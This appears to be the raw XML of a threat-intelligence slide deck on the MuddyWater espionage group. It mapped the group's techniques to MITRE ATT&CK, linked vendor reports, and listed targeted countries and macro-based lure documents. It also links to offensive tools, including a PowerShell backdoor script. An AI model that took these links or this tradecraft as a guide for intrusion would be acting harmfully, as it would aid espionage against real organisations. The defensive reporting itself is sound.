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Average" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald" panose="00000500000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold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3C387C-82AE-4516-9D41-3D8AFD676D0F}">
  <a:tblStyle styleId="{E93C387C-82AE-4516-9D41-3D8AFD676D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9223c9032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9223c903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19223c903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19223c903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19223c9032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19223c903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19223c903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19223c903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19223c903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19223c90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19223c9032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19223c903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19223c903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19223c903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19223c9032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19223c903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9223c903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19223c903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19223c9032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19223c9032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18c729a000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18c729a00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19223c9032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19223c9032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9223c903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19223c903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19223c9032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19223c9032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19223c9032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19223c903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19223c9032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19223c9032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9223c9032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9223c9032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9223c9032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19223c9032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19223c9032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19223c9032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19223c9032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19223c9032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19223c9032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19223c9032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18c729a000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18c729a000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19223c9032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19223c903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19223c9032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19223c903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9223c9032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9223c903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19223c9032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19223c9032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19223c9032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19223c9032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19223c903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19223c90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18c729a000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18c729a000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18c729a000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18c729a000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18c729a000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18c729a000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8c729a000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8c729a000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9223c90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9223c90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ru"/>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nit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/#Appendix"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vergl4s/pentesting-dump/blob/master/net/Windows/PS2EXE-v0.5.0.0/ps2exe.ps1"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blog.morphisec.com/fileless-attack-framework-discovery" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hybrid-analysis.com/sample/c26a351c36ac03aa09f5d98531a103f971b84e22b6a1312bf1dc501421434290?environmentId=100"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fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/03/dnsmessenger.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anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencie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www.remoteutilities.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.connectwise.com/company/announcements/screenconnect-now-connectwise-control" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/18/c/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia.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attack.mitre.org/groups/G0069"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moteutilities.com/"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countercept/python-exe-unpacker/blob/master/pyinstxtractor.py"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sourceforge.net/projects/easypythondecompiler/"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www.zdnet.com/article/iranian-state-hacker-group-linked-to-ransomware-deployments/?ref=cisco-talos-blog" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vaja.ir/?ref=cisco-talos-blog" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-espionage-group?ref=cisco-talos-blo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cisa.gov/uscert/ncas/alerts/aa20-006a?ref=cisco-talos-blog" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malpedia.caad.fkie.fraunhofer.de/actor/muddywater?ref=cisco-talos-blog" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/?ref=cisco-talos-blog" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/001" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/003" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/003" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/006" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/002" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0349" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/001" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0223" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/001" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0069" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/001" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/007" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/001" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/005" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1140" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/002" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/006" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0594" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074/001" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583"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attack.mitre.org/techniques/T1083" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/002" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/002" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/002" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/001" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/005" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/004" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/003" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/001" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/002" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0069" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/001" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/001" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/002" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518/001" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/005" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/011" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/001" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1219" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0349" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1057" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/005" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0069" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/003" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/002" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1113" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/004" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/001" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0223" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003"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attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1046" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0591" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0349" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0223" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1037" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1035" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0250" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0194" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0363" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0450" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0594" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0488" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1047" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S059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blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/"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sec0wn.blogspot.sg/2017/10/continued-activity-targeting-middle-east.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.morphisec.com/fileless-attack-framework-discove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0" y="42400"/>
            <a:ext cx="9144001" cy="510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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35325" y="35325"/>
            <a:ext cx="9071700" cy="5065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135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ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The activity has been consistent throughout 2017 and, based on our analysis, targets or is suspected to target, entities in the following countries:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Saudi Arabia</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Iraq</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Israel</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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United Arab Emirates</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Georgia</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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India</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Pakistan</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Turkey</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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USA</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The malicious documents were adjusted according to the target regions, often using the logos of branches of local government, prompting the users to bypass security controls and enable macros. An overview of the technical changes seen in the past year is given in the graphic below, note that raw IOCs present in this graphic can be found as text in the </a:t>
            </a:r>
            <a:r>
